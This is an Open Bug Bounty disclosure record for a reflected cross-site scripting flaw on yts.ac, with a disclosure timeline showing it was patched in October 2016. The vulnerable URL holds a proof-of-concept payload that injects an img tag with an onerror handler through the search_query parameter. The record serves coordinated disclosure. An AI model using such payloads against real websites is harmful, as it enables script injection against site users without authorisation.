yts.ac XSS vulnerability

2016-09-26T01:50:00
ID OBB:183595
Type openbugbounty
Reporter WhitePacket
Modified 2016-10-17T20:30:00

Description

Vulnerable URL:
http://yts.ac/browse-movies/?search_download=all&search_query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(/XSSPOSED/)%3E&search_order=latest&search_category=all&search_rating=all
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 29259
VIP website status:| Yes
Check yts.ac SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 September, 2016 01:50 GMT
Generic security notifications sent to website owner| 26 September, 2016 01:52 GMT
Vulnerability details disclosed by researcher| 17 October, 2016 02:13 GMT
Vulnerability patched by the website owner| 17 October, 2016 20:30 GMT